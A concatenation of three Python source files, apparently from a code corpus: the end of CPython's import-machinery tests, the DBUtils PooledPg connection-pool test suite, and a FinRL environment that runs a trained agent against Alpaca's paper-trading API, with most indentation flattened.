self.assertRaises(ImportError, __import__, TESTFN)
@skip_if_dont_write_bytecode
def test_missing_source_legacy(self):
# Like test_missing_source() except that for backward compatibility,
# when the pyc file lives where the py file would have been (and named
# without the tag), it is importable. The __file__ of the imported
# module is the pyc location.
__import__(TESTFN)
# pyc_file gets removed in _clean() via tearDown().
pyc_file = make_legacy_pyc(self.source)
os.remove(self.source)
unload(TESTFN)
importlib.invalidate_caches()
m = __import__(TESTFN)
try:
self.assertEqual(m.__file__,
os.path.join(os.curdir, os.path.relpath(pyc_file)))
finally:
os.remove(pyc_file)
def test___cached__(self):
# Modules now also have an __cached__ that points to the pyc file.
m = __import__(TESTFN)
pyc_file = importlib.util.cache_from_source(TESTFN + '.py')
self.assertEqual(m.__cached__, os.path.join(os.curdir, pyc_file))
@skip_if_dont_write_bytecode
def test___cached___legacy_pyc(self):
# Like test___cached__() except that for backward compatibility,
# when the pyc file lives where the py file would have been (and named
# without the tag), it is importable. The __cached__ of the imported
# module is the pyc location.
__import__(TESTFN)
# pyc_file gets removed in _clean() via tearDown().
pyc_file = make_legacy_pyc(self.source)
os.remove(self.source)
unload(TESTFN)
importlib.invalidate_caches()
m = __import__(TESTFN)
self.assertEqual(m.__cached__,
os.path.join(os.curdir, os.path.relpath(pyc_file)))
@skip_if_dont_write_bytecode
def test_package___cached__(self):
# Like test___cached__ but for packages.
def cleanup():
rmtree('pep3147')
unload('pep3147.foo')
unload('pep3147')
os.mkdir('pep3147')
self.addCleanup(cleanup)
# Touch the __init__.py
with open(os.path.join('pep3147', '__init__.py'), 'w'):
pass
with open(os.path.join('pep3147', 'foo.py'), 'w'):
pass
importlib.invalidate_caches()
m = __import__('pep3147.foo')
init_pyc = importlib.util.cache_from_source(
os.path.join('pep3147', '__init__.py'))
self.assertEqual(m.__cached__, os.path.join(os.curdir, init_pyc))
foo_pyc = importlib.util.cache_from_source(os.path.join('pep3147', 'foo.py'))
self.assertEqual(sys.modules['pep3147.foo'].__cached__,
os.path.join(os.curdir, foo_pyc))
def test_package___cached___from_pyc(self):
# Like test___cached__ but ensuring __cached__ when imported from a
# PEP 3147 pyc file.
def cleanup():
rmtree('pep3147')
unload('pep3147.foo')
unload('pep3147')
os.mkdir('pep3147')
self.addCleanup(cleanup)
# Touch the __init__.py
with open(os.path.join('pep3147', '__init__.py'), 'w'):
pass
with open(os.path.join('pep3147', 'foo.py'), 'w'):
pass
importlib.invalidate_caches()
m = __import__('pep3147.foo')
unload('pep3147.foo')
unload('pep3147')
importlib.invalidate_caches()
m = __import__('pep3147.foo')
init_pyc = importlib.util.cache_from_source(
os.path.join('pep3147', '__init__.py'))
self.assertEqual(m.__cached__, os.path.join(os.curdir, init_pyc))
foo_pyc = importlib.util.cache_from_source(os.path.join('pep3147', 'foo.py'))
self.assertEqual(sys.modules['pep3147.foo'].__cached__,
os.path.join(os.curdir, foo_pyc))
def test_recompute_pyc_same_second(self):
# Even when the source file doesn't change timestamp, a change in
# source size is enough to trigger recomputation of the pyc file.
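        # (The timestamp-based pyc header records both the source mtime and the
        # source size, so a same-second edit that changes the size still
        # invalidates the cached bytecode; see PEP 552 for the header layout.)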
__import__(TESTFN)
unload(TESTFN)
with open(self.source, 'a') as fp:
print("x = 5", file=fp)
m = __import__(TESTFN)
self.assertEqual(m.x, 5)
class TestSymbolicallyLinkedPackage(unittest.TestCase):
package_name = 'sample'
tagged = package_name + '-tagged'
def setUp(self):
test.support.rmtree(self.tagged)
test.support.rmtree(self.package_name)
self.orig_sys_path = sys.path[:]
# create a sample package; imagine you have a package with a tag and
# you want to symbolically link it from its untagged name.
os.mkdir(self.tagged)
self.addCleanup(test.support.rmtree, self.tagged)
init_file = os.path.join(self.tagged, '__init__.py')
test.support.create_empty_file(init_file)
assert os.path.exists(init_file)
# now create a symlink to the tagged package
# sample -> sample-tagged
os.symlink(self.tagged, self.package_name, target_is_directory=True)
self.addCleanup(test.support.unlink, self.package_name)
importlib.invalidate_caches()
self.assertEqual(os.path.isdir(self.package_name), True)
assert os.path.isfile(os.path.join(self.package_name, '__init__.py'))
def tearDown(self):
sys.path[:] = self.orig_sys_path
# regression test for issue6727
@unittest.skipUnless(
not hasattr(sys, 'getwindowsversion')
or sys.getwindowsversion() >= (6, 0),
"Windows Vista or later required")
@test.support.skip_unless_symlink
def test_symlinked_dir_importable(self):
# make sure sample can only be imported from the current directory.
sys.path[:] = ['.']
assert os.path.exists(self.package_name)
assert os.path.exists(os.path.join(self.package_name, '__init__.py'))
# Try to import the package
importlib.import_module(self.package_name)
@cpython_only
class ImportlibBootstrapTests(unittest.TestCase):
# These tests check that importlib is bootstrapped.
def test_frozen_importlib(self):
mod = sys.modules['_frozen_importlib']
self.assertTrue(mod)
def test_frozen_importlib_is_bootstrap(self):
from importlib import _bootstrap
mod = sys.modules['_frozen_importlib']
self.assertIs(mod, _bootstrap)
self.assertEqual(mod.__name__, 'importlib._bootstrap')
self.assertEqual(mod.__package__, 'importlib')
self.assertTrue(mod.__file__.endswith('_bootstrap.py'), mod.__file__)
def test_frozen_importlib_external_is_bootstrap_external(self):
from importlib import _bootstrap_external
mod = sys.modules['_frozen_importlib_external']
self.assertIs(mod, _bootstrap_external)
self.assertEqual(mod.__name__, 'importlib._bootstrap_external')
self.assertEqual(mod.__package__, 'importlib')
self.assertTrue(mod.__file__.endswith('_bootstrap_external.py'), mod.__file__)
def test_there_can_be_only_one(self):
# Issue #15386 revealed a tricky loophole in the bootstrapping
# This test is technically redundant, since the bug caused importing
# this test module to crash completely, but it helps prove the point
from importlib import machinery
mod = sys.modules['_frozen_importlib']
self.assertIs(machinery.ModuleSpec, mod.ModuleSpec)
@cpython_only
class GetSourcefileTests(unittest.TestCase):
"""Test importlib._bootstrap_external._get_sourcefile() as used by the C API.
    Because of the peculiar requirements this function serves for the C API,
    the tests are knowingly whitebox tests.
"""
def test_get_sourcefile(self):
# Given a valid bytecode path, return the path to the corresponding
# source file if it exists.
with mock.patch('importlib._bootstrap_external._path_isfile') as _path_isfile:
            _path_isfile.return_value = True
path = TESTFN + '.pyc'
expect = TESTFN + '.py'
self.assertEqual(_get_sourcefile(path), expect)
def test_get_sourcefile_no_source(self):
# Given a valid bytecode path without a corresponding source path,
# return the original bytecode path.
with mock.patch('importlib._bootstrap_external._path_isfile') as _path_isfile:
            _path_isfile.return_value = False
path = TESTFN + '.pyc'
self.assertEqual(_get_sourcefile(path), path)
def test_get_sourcefile_bad_ext(self):
# Given a path with an invalid bytecode extension, return the
# bytecode path passed as the argument.
path = TESTFN + '.bad_ext'
self.assertEqual(_get_sourcefile(path), path)
class ImportTracebackTests(unittest.TestCase):
def setUp(self):
os.mkdir(TESTFN)
self.old_path = sys.path[:]
sys.path.insert(0, TESTFN)
def tearDown(self):
sys.path[:] = self.old_path
rmtree(TESTFN)
def create_module(self, mod, contents, ext=".py"):
fname = os.path.join(TESTFN, mod + ext)
with open(fname, "w") as f:
f.write(contents)
self.addCleanup(unload, mod)
importlib.invalidate_caches()
return fname
def assert_traceback(self, tb, files):
deduped_files = []
while tb:
code = tb.tb_frame.f_code
fn = code.co_filename
if not deduped_files or fn != deduped_files[-1]:
deduped_files.append(fn)
tb = tb.tb_next
self.assertEqual(len(deduped_files), len(files), deduped_files)
for fn, pat in zip(deduped_files, files):
self.assertIn(pat, fn)
def test_nonexistent_module(self):
try:
# assertRaises() clears __traceback__
import nonexistent_xyzzy
except ImportError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__])
def test_nonexistent_module_nested(self):
self.create_module("foo", "import nonexistent_xyzzy")
try:
import foo
except ImportError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py'])
def test_exec_failure(self):
self.create_module("foo", "1/0")
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py'])
def test_exec_failure_nested(self):
self.create_module("foo", "import bar")
self.create_module("bar", "1/0")
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py', 'bar.py'])
# A few more examples from issue #15425
def test_syntax_error(self):
self.create_module("foo", "invalid syntax is invalid")
try:
import foo
except SyntaxError as e:
tb = e.__traceback__
else:
self.fail("SyntaxError should have been raised")
self.assert_traceback(tb, [__file__])
def _setup_broken_package(self, parent, child):
pkg_name = "_parent_foo"
self.addCleanup(unload, pkg_name)
pkg_path = os.path.join(TESTFN, pkg_name)
os.mkdir(pkg_path)
# Touch the __init__.py
init_path = os.path.join(pkg_path, '__init__.py')
with open(init_path, 'w') as f:
f.write(parent)
bar_path = os.path.join(pkg_path, 'bar.py')
with open(bar_path, 'w') as f:
f.write(child)
importlib.invalidate_caches()
return init_path, bar_path
def test_broken_submodule(self):
init_path, bar_path = self._setup_broken_package("", "1/0")
try:
import _parent_foo.bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, bar_path])
def test_broken_from(self):
init_path, bar_path = self._setup_broken_package("", "1/0")
try:
from _parent_foo import bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__, bar_path])
def test_broken_parent(self):
init_path, bar_path = self._setup_broken_package("1/0", "")
try:
import _parent_foo.bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, init_path])
def test_broken_parent_from(self):
init_path, bar_path = self._setup_broken_package("1/0", "")
try:
from _parent_foo import bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, init_path])
@cpython_only
def test_import_bug(self):
# We simulate a bug in importlib and check that it's not stripped
# away from the traceback.
self.create_module("foo", "")
importlib = sys.modules['_frozen_importlib_external']
if 'load_module' in vars(importlib.SourceLoader):
old_exec_module = importlib.SourceLoader.exec_module
else:
old_exec_module = None
try:
def exec_module(*args):
1/0
importlib.SourceLoader.exec_module = exec_module
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, '<frozen importlib', __file__])
finally:
if old_exec_module is None:
del importlib.SourceLoader.exec_module
else:
importlib.SourceLoader.exec_module = old_exec_module
@unittest.skipUnless(TESTFN_UNENCODABLE, 'need TESTFN_UNENCODABLE')
def test_unencodable_filename(self):
# Issue #11619: The Python parser and the import machinery must not
# encode filenames, especially on Windows
pyname = script_helper.make_script('', TESTFN_UNENCODABLE, 'pass')
self.addCleanup(unlink, pyname)
name = pyname[:-3]
script_helper.assert_python_ok("-c", "mod = __import__(%a)" % name,
__isolated=False)
class CircularImportTests(unittest.TestCase):
"""See the docstrings of the modules being imported for the purpose of the
test."""
def tearDown(self):
"""Make sure no modules pre-exist in sys.modules which are being used to
test."""
for key in list(sys.modules.keys()):
if key.startswith('test.test_import.data.circular_imports'):
del sys.modules[key]
def test_direct(self):
try:
import test.test_import.data.circular_imports.basic
except ImportError:
self.fail('circular import through relative imports failed')
def test_indirect(self):
try:
import test.test_import.data.circular_imports.indirect
except ImportError:
self.fail('relative import in module contributing to circular '
'import failed')
def test_subpackage(self):
try:
import test.test_import.data.circular_imports.subpackage
except ImportError:
self.fail('circular import involving a subpackage failed')
def test_rebinding(self):
try:
import test.test_import.data.circular_imports.rebinding as rebinding
except ImportError:
self.fail('circular import with rebinding of module attribute failed')
from test.test_import.data.circular_imports.subpkg import util
self.assertIs(util.util, rebinding.util)
def test_binding(self):
try:
import test.test_import.data.circular_imports.binding
except ImportError:
self.fail('circular import with binding a submodule to a name failed')
def test_crossreference1(self):
import test.test_import.data.circular_imports.use
import test.test_import.data.circular_imports.source
def test_crossreference2(self):
with self.assertRaises(AttributeError) as cm:
import test.test_import.data.circular_imports.source
errmsg = str(cm.exception)
self.assertIn('test.test_import.data.circular_imports.source', errmsg)
self.assertIn('spam', errmsg)
self.assertIn('partially initialized module', errmsg)
self.assertIn('circular import', errmsg)
def test_circular_from_import(self):
with self.assertRaises(ImportError) as cm:
import test.test_import.data.circular_imports.from_cycle1
self.assertIn(
"cannot import name 'b' from partially initialized module "
"'test.test_import.data.circular_imports.from_cycle1' "
"(most likely due to a circular import)",
str(cm.exception),
)
if __name__ == '__main__':
# Test needs to be a package, so we can do relative imports.
unittest.main()
|
test_pooled_pg.py
|
"""Test the PooledPg module.
Note:
    We don't test performance here, so this test does not indicate whether
    PooledPg will actually help to improve performance.
We also assume that the underlying SteadyPg connections are tested.
Copyright and credit info:
* This test was contributed by Christoph Zwerschke
"""
import unittest
from . import mock_pg # noqa
from dbutils.pooled_pg import PooledPg, InvalidConnection, TooManyConnections
class TestPooledPg(unittest.TestCase):
def test_version(self):
from dbutils import __version__, pooled_pg
self.assertEqual(pooled_pg.__version__, __version__)
self.assertEqual(PooledPg.version, __version__)
def test_create_connection(self):
pool = PooledPg(
1, 1, 0, False, None, None, False,
'PooledPgTestDB', user='PooledPgTestUser')
self.assertTrue(hasattr(pool, '_cache'))
self.assertEqual(pool._cache.qsize(), 1)
self.assertTrue(hasattr(pool, '_maxusage'))
self.assertIsNone(pool._maxusage)
self.assertTrue(hasattr(pool, '_setsession'))
self.assertIsNone(pool._setsession)
self.assertTrue(hasattr(pool, '_reset'))
self.assertFalse(pool._reset)
db_con = pool._cache.get(0)
pool._cache.put(db_con, 0)
from dbutils.steady_pg import SteadyPgConnection
self.assertTrue(isinstance(db_con, SteadyPgConnection))
db = pool.connection()
self.assertEqual(pool._cache.qsize(), 0)
self.assertTrue(hasattr(db, '_con'))
self.assertEqual(db._con, db_con)
self.assertTrue(hasattr(db, 'query'))
self.assertTrue(hasattr(db, 'num_queries'))
self.assertEqual(db.num_queries, 0)
self.assertTrue(hasattr(db, '_maxusage'))
self.assertEqual(db._maxusage, 0)
self.assertTrue(hasattr(db, '_setsession_sql'))
self.assertIsNone(db._setsession_sql)
self.assertTrue(hasattr(db, 'dbname'))
self.assertEqual(db.dbname, 'PooledPgTestDB')
self.assertTrue(hasattr(db, 'user'))
self.assertEqual(db.user, 'PooledPgTestUser')
db.query('select test')
self.assertEqual(db.num_queries, 1)
pool = PooledPg(1)
db = pool.connection()
self.assertTrue(hasattr(db, 'dbname'))
self.assertIsNone(db.dbname)
self.assertTrue(hasattr(db, 'user'))
self.assertIsNone(db.user)
self.assertTrue(hasattr(db, 'num_queries'))
self.assertEqual(db.num_queries, 0)
pool = PooledPg(0, 0, 0, False, 3, ('set datestyle',),)
self.assertEqual(pool._maxusage, 3)
self.assertEqual(pool._setsession, ('set datestyle',))
db = pool.connection()
self.assertEqual(db._maxusage, 3)
self.assertEqual(db._setsession_sql, ('set datestyle',))
def test_close_connection(self):
pool = PooledPg(
0, 1, 0, False, None, None, False,
'PooledPgTestDB', user='PooledPgTestUser')
db = pool.connection()
self.assertTrue(hasattr(db, '_con'))
db_con = db._con
from dbutils.steady_pg import SteadyPgConnection
self.assertTrue(isinstance(db_con, SteadyPgConnection))
self.assertTrue(hasattr(pool, '_cache'))
self.assertEqual(pool._cache.qsize(), 0)
self.assertEqual(db.num_queries, 0)
db.query('select test')
self.assertEqual(db.num_queries, 1)
db.close()
self.assertRaises(InvalidConnection, getattr, db, 'num_queries')
db = pool.connection()
self.assertTrue(hasattr(db, 'dbname'))
self.assertEqual(db.dbname, 'PooledPgTestDB')
self.assertTrue(hasattr(db, 'user'))
self.assertEqual(db.user, 'PooledPgTestUser')
self.assertEqual(db.num_queries, 1)
db.query('select test')
self.assertEqual(db.num_queries, 2)
db = pool.connection()
self.assertEqual(pool._cache.qsize(), 1)
self.assertEqual(pool._cache.get(0), db_con)
def test_min_max_cached(self):
pool = PooledPg(3)
self.assertTrue(hasattr(pool, '_cache'))
self.assertEqual(pool._cache.qsize(), 3)
cache = [pool.connection() for i in range(3)]
self.assertEqual(pool._cache.qsize(), 0)
for i in range(3):
cache.pop().close()
self.assertEqual(pool._cache.qsize(), 3)
for i in range(6):
cache.append(pool.connection())
self.assertEqual(pool._cache.qsize(), 0)
for i in range(6):
cache.pop().close()
self.assertEqual(pool._cache.qsize(), 6)
pool = PooledPg(3, 4)
self.assertTrue(hasattr(pool, '_cache'))
self.assertEqual(pool._cache.qsize(), 3)
cache = [pool.connection() for i in range(3)]
self.assertEqual(pool._cache.qsize(), 0)
for i in range(3):
cache.pop().close()
self.assertEqual(pool._cache.qsize(), 3)
for i in range(6):
cache.append(pool.connection())
self.assertEqual(pool._cache.qsize(), 0)
for i in range(6):
cache.pop().close()
self.assertEqual(pool._cache.qsize(), 4)
pool = PooledPg(3, 2)
self.assertTrue(hasattr(pool, '_cache'))
self.assertEqual(pool._cache.qsize(), 3)
cache = [pool.connection() for i in range(4)]
self.assertEqual(pool._cache.qsize(), 0)
for i in range(4):
cache.pop().close()
self.assertEqual(pool._cache.qsize(), 3)
pool = PooledPg(2, 5)
self.assertTrue(hasattr(pool, '_cache'))
self.assertEqual(pool._cache.qsize(), 2)
cache = [pool.connection() for i in range(10)]
self.assertEqual(pool._cache.qsize(), 0)
for i in range(10):
cache.pop().close()
self.assertEqual(pool._cache.qsize(), 5)
def test_max_connections(self):
from dbutils.pooled_pg import TooManyConnections
pool = PooledPg(1, 2, 3)
self.assertEqual(pool._cache.qsize(), 1)
cache = [pool.connection() for i in range(3)]
self.assertEqual(pool._cache.qsize(), 0)
self.assertRaises(TooManyConnections, pool.connection)
pool = PooledPg(0, 1, 1, False)
self.assertEqual(pool._blocking, 0)
self.assertEqual(pool._cache.qsize(), 0)
db = pool.connection()
self.assertEqual(pool._cache.qsize(), 0)
self.assertRaises(TooManyConnections, pool.connection)
del db
del cache
pool = PooledPg(1, 2, 1)
self.assertEqual(pool._cache.qsize(), 1)
cache = [pool.connection()]
self.assertEqual(pool._cache.qsize(), 0)
cache.append(pool.connection())
self.assertEqual(pool._cache.qsize(), 0)
self.assertRaises(TooManyConnections, pool.connection)
pool = PooledPg(3, 2, 1, False)
self.assertEqual(pool._cache.qsize(), 3)
cache = [pool.connection() for i in range(3)]
self.assertEqual(len(cache), 3)
self.assertEqual(pool._cache.qsize(), 0)
self.assertRaises(TooManyConnections, pool.connection)
pool = PooledPg(1, 1, 1, True)
self.assertEqual(pool._blocking, 1)
self.assertEqual(pool._cache.qsize(), 1)
db = pool.connection()
self.assertEqual(pool._cache.qsize(), 0)
def connection():
pool.connection().query('set thread')
from threading import Thread
thread = Thread(target=connection)
thread.start()
thread.join(0.1)
self.assertTrue(thread.is_alive())
self.assertEqual(pool._cache.qsize(), 0)
session = db._con.session
self.assertEqual(session, [])
del db
thread.join(0.1)
self.assertFalse(thread.is_alive())
self.assertEqual(pool._cache.qsize(), 1)
db = pool.connection()
self.assertEqual(pool._cache.qsize(), 0)
self.assertEqual(session, ['thread'])
del db
def test_one_thread_two_connections(self):
pool = PooledPg(2)
db1 = pool.connection()
for i in range(5):
db1.query('select test')
db2 = pool.connection()
self.assertNotEqual(db1, db2)
self.assertNotEqual(db1._con, db2._con)
for i in range(7):
db2.query('select test')
self.assertEqual(db1.num_queries, 5)
self.assertEqual(db2.num_queries, 7)
del db1
db1 = pool.connection()
self.assertNotEqual(db1, db2)
self.assertNotEqual(db1._con, db2._con)
self.assertTrue(hasattr(db1, 'query'))
for i in range(3):
db1.query('select test')
self.assertEqual(db1.num_queries, 8)
db2.query('select test')
self.assertEqual(db2.num_queries, 8)
def test_three_threads_two_connections(self):
pool = PooledPg(2, 2, 2, True)
try:
from queue import Queue, Empty
except ImportError: # Python 2
from Queue import Queue, Empty
queue = Queue(3)
def connection():
try:
queue.put(pool.connection(), 1, 1)
except TypeError:
queue.put(pool.connection(), 1)
from threading import Thread
for i in range(3):
Thread(target=connection).start()
try:
db1 = queue.get(1, 1)
db2 = queue.get(1, 1)
except TypeError:
db1 = queue.get(1)
db2 = queue.get(1)
db1_con = db1._con
db2_con = db2._con
self.assertNotEqual(db1, db2)
self.assertNotEqual(db1_con, db2_con)
try:
self.assertRaises(Empty, queue.get, 1, 0.1)
except TypeError:
self.assertRaises(Empty, queue.get, 0)
del db1
try:
db1 = queue.get(1, 1)
except TypeError:
db1 = queue.get(1)
self.assertNotEqual(db1, db2)
self.assertNotEqual(db1._con, db2._con)
self.assertEqual(db1._con, db1_con)
def test_reset_transaction(self):
pool = PooledPg(1)
db = pool.connection()
db.begin()
con = db._con
self.assertTrue(con._transaction)
db.query('select test')
self.assertEqual(con.num_queries, 1)
db.close()
self.assertIs(pool.connection()._con, con)
self.assertFalse(con._transaction)
self.assertEqual(con.session, ['begin', 'rollback'])
self.assertEqual(con.num_queries, 1)
pool = PooledPg(1, reset=1)
db = pool.connection()
db.begin()
con = db._con
self.assertTrue(con._transaction)
self.assertEqual(con.session, ['rollback', 'begin'])
db.query('select test')
self.assertEqual(con.num_queries, 1)
db.close()
self.assertIs(pool.connection()._con, con)
self.assertFalse(con._transaction)
self.assertEqual(
con.session, ['rollback', 'begin', 'rollback', 'rollback'])
self.assertEqual(con.num_queries, 1)
pool = PooledPg(1, reset=2)
db = pool.connection()
db.begin()
con = db._con
self.assertTrue(con._transaction)
self.assertEqual(con.session, ['begin'])
db.query('select test')
self.assertEqual(con.num_queries, 1)
db.close()
self.assertIs(pool.connection()._con, con)
self.assertFalse(con._transaction)
self.assertEqual(con.session, [])
self.assertEqual(con.num_queries, 0)
def test_context_manager(self):
pool = PooledPg(1, 1, 1)
with pool.connection() as db:
db_con = db._con._con
db.query('select test')
self.assertEqual(db_con.num_queries, 1)
self.assertRaises(TooManyConnections, pool.connection)
with pool.connection() as db:
db_con = db._con._con
db.query('select test')
self.assertEqual(db_con.num_queries, 2)
self.assertRaises(TooManyConnections, pool.connection)
if __name__ == '__main__':
unittest.main()
|
env_stock_papertrading_erl.py
|
import datetime
import threading
import time
import alpaca_trade_api as tradeapi
import gym
import numpy as np
import pandas as pd
import torch
from finrl_meta.data_processors.alpaca import Alpaca
class AlpacaPaperTrading_erl():
def __init__(self, ticker_list, time_interval, agent, cwd, net_dim,
state_dim, action_dim, API_KEY, API_SECRET,
API_BASE_URL, tech_indicator_list, turbulence_thresh=30,
max_stock=1e2, latency=None):
# load agent
if agent == 'ppo':
from elegantrl.agent import AgentPPO
from elegantrl.run import Arguments, init_agent
# load agent
config = {'state_dim': state_dim,
'action_dim': action_dim, }
args = Arguments(agent=AgentPPO, env=StockEnvEmpty(config))
args.cwd = cwd
args.net_dim = net_dim
# load agent
try:
agent = init_agent(args, gpu_id=0)
self.act = agent.act
self.device = agent.device
            except BaseException as error:
                raise ValueError("Failed to load the agent!") from error
else:
raise ValueError('Agent input is NOT supported yet.')
# connect to Alpaca trading API
try:
self.alpaca = tradeapi.REST(API_KEY, API_SECRET, API_BASE_URL, 'v2')
        except Exception as error:
            raise ValueError('Failed to connect to Alpaca. Please check your '
                             'account info and internet connection.') from error
# read trading time interval
if time_interval == '1s':
self.time_interval = 1
elif time_interval == '5s':
self.time_interval = 5
elif time_interval == '1Min':
self.time_interval = 60
elif time_interval == '5Min':
self.time_interval = 60 * 5
elif time_interval == '15Min':
self.time_interval = 60 * 15
else:
raise ValueError('Time interval input is NOT supported yet.')
# read trading settings
self.tech_indicator_list = tech_indicator_list
self.turbulence_thresh = turbulence_thresh
self.max_stock = max_stock
# initialize account
self.stocks = np.asarray([0] * len(ticker_list)) # stocks holding
self.stocks_cd = np.zeros_like(self.stocks)
self.cash = None # cash record
self.stocks_df = pd.DataFrame(self.stocks, columns=['stocks'], index=ticker_list)
self.asset_list = []
self.price = np.asarray([0] * len(ticker_list))
self.stockUniverse = ticker_list
self.turbulence_bool = 0
self.equities = []
def test_latency(self, test_times=10):
total_time = 0
for i in range(0, test_times):
time0 = time.time()
self.get_state()
time1 = time.time()
temp_time = time1 - time0
total_time += temp_time
latency = total_time / test_times
print('latency for data processing: ', latency)
return latency
def run(self):
orders = self.alpaca.list_orders(status="open")
for order in orders:
self.alpaca.cancel_order(order.id)
# Wait for market to open.
print("Waiting for market to open...")
tAMO = threading.Thread(target=self.awaitMarketOpen)
tAMO.start()
tAMO.join()
print("Market opened.")
while True:
# Figure out when the market will close so we can prepare to sell beforehand.
clock = self.alpaca.get_clock()
closingTime = clock.next_close.replace(tzinfo=datetime.timezone.utc).timestamp()
currTime = clock.timestamp.replace(tzinfo=datetime.timezone.utc).timestamp()
self.timeToClose = closingTime - currTime
            if self.timeToClose < 60:
                # Stop trading when less than one minute remains until market close.
                print("Market closing soon. Stop trading.")
break
'''# Close all positions when 1 minutes til market close.
print("Market closing soon. Closing positions.")
positions = self.alpaca.list_positions()
for position in positions:
if(position.side == 'long'):
orderSide = 'sell'
else:
orderSide = 'buy'
qty = abs(int(float(position.qty)))
respSO = []
tSubmitOrder = threading.Thread(target=self.submitOrder(qty, position.symbol, orderSide, respSO))
tSubmitOrder.start()
tSubmitOrder.join()
# Run script again after market close for next trading day.
print("Sleeping until market close (15 minutes).")
time.sleep(60 * 15)'''
else:
trade = threading.Thread(target=self.trade)
trade.start()
trade.join()
last_equity = float(self.alpaca.get_account().last_equity)
cur_time = time.time()
self.equities.append([cur_time, last_equity])
time.sleep(self.time_interval)
def awaitMarketOpen(self):
isOpen = self.alpaca.get_clock().is_open
while (not isOpen):
clock = self.alpaca.get_clock()
openingTime = clock.next_open.replace(tzinfo=datetime.timezone.utc).timestamp()
currTime = clock.timestamp.replace(tzinfo=datetime.timezone.utc).timestamp()
timeToOpen = int((openingTime - currTime) / 60)
print(str(timeToOpen) + " minutes til market open.")
time.sleep(60)
isOpen = self.alpaca.get_clock().is_open
def trade(self):
state = self.get_state()
with torch.no_grad():
s_tensor = torch.as_tensor((state,), device=self.device)
a_tensor = self.act(s_tensor)
action = a_tensor.detach().cpu().numpy()[0]
action = (action * self.max_stock).astype(int)
self.stocks_cd += 1
if self.turbulence_bool == 0:
min_action = 10 # stock_cd
for index in np.where(action < -min_action)[0]: # sell_index:
sell_num_shares = min(self.stocks[index], -action[index])
qty = abs(int(sell_num_shares))
respSO = []
                tSubmitOrder = threading.Thread(target=self.submitOrder, args=(qty, self.stockUniverse[index], 'sell', respSO))
tSubmitOrder.start()
tSubmitOrder.join()
self.cash = float(self.alpaca.get_account().cash)
self.stocks_cd[index] = 0
for index in np.where(action > min_action)[0]: # buy_index:
if self.cash < 0:
tmp_cash = 0
else:
tmp_cash = self.cash
buy_num_shares = min(tmp_cash // self.price[index], abs(int(action[index])))
qty = abs(int(buy_num_shares))
respSO = []
                tSubmitOrder = threading.Thread(target=self.submitOrder, args=(qty, self.stockUniverse[index], 'buy', respSO))
tSubmitOrder.start()
tSubmitOrder.join()
self.cash = float(self.alpaca.get_account().cash)
self.stocks_cd[index] = 0
else: # sell all when turbulence
positions = self.alpaca.list_positions()
for position in positions:
if (position.side == 'long'):
orderSide = 'sell'
else:
orderSide = 'buy'
qty = abs(int(float(position.qty)))
respSO = []
                tSubmitOrder = threading.Thread(target=self.submitOrder, args=(qty, position.symbol, orderSide, respSO))
tSubmitOrder.start()
tSubmitOrder.join()
self.stocks_cd[:] = 0
def get_state(self):
alpaca = Alpaca(api=self.alpaca)
price, tech, turbulence = alpaca.fetch_latest_data(ticker_list=self.stockUniverse, time_interval='1Min',
tech_indicator_list=self.tech_indicator_list)
turbulence_bool = 1 if turbulence >= self.turbulence_thresh else 0
turbulence = (self.sigmoid_sign(turbulence, self.turbulence_thresh) * 2 ** -5).astype(np.float32)
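        # sigmoid_sign() squashes the raw turbulence value into roughly
        # (-thresh / 2, thresh / 2); the extra 2 ** -5 factor (and 2 ** -7 for
        # the tech indicators below) keeps the features in a small numeric
        # range for the policy network.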
tech = tech * 2 ** -7
positions = self.alpaca.list_positions()
stocks = [0] * len(self.stockUniverse)
for position in positions:
ind = self.stockUniverse.index(position.symbol)
stocks[ind] = (abs(int(float(position.qty))))
stocks = np.asarray(stocks, dtype=float)
cash = float(self.alpaca.get_account().cash)
self.cash = cash
self.stocks = stocks
self.turbulence_bool = turbulence_bool
self.price = price
amount = np.array(max(self.cash, 1e4) * (2 ** -12), dtype=np.float32)
scale = np.array(2 ** -6, dtype=np.float32)
state = np.hstack((amount,
turbulence,
self.turbulence_bool,
price * scale,
self.stocks * scale,
self.stocks_cd,
tech,
)).astype(np.float32)
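        # State layout (one flat vector): [scaled cash (1), scaled turbulence (1),
        # turbulence flag (1), scaled prices (n_stocks), scaled holdings (n_stocks),
        # holding cooldowns (n_stocks), scaled tech indicators]. Assuming one value
        # per indicator per ticker, state_dim works out to
        # 3 + 3 * n_stocks + n_stocks * len(tech_indicator_list).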
print(len(self.stockUniverse))
return state
def submitOrder(self, qty, stock, side, resp):
if (qty > 0):
try:
self.alpaca.submit_order(stock, qty, side, "market", "day")
print("Market order of | " + str(qty) + " " + stock + " " + side + " | completed.")
resp.append(True)
except:
print("Order of | " + str(qty) + " " + stock + " " + side + " | did not go through.")
resp.append(False)
else:
print("Quantity is 0, order of | " + str(qty) + " " + stock + " " + side + " | not completed.")
resp.append(True)
@staticmethod
def sigmoid_sign(ary, thresh):
def sigmoid(x):
return 1 / (1 + np.exp(-x * np.e)) - 0.5
return sigmoid(ary / thresh) * thresh
class StockEnvEmpty(gym.Env):
# Empty Env used for loading rllib agent
def __init__(self, config):
state_dim = config['state_dim']
action_dim = config['action_dim']
self.env_num = 1
self.max_step = 10000
self.env_name = 'StockEnvEmpty'
self.state_dim = state_dim
self.action_dim = action_dim
self.if_discrete = False
self.target_return = 9999
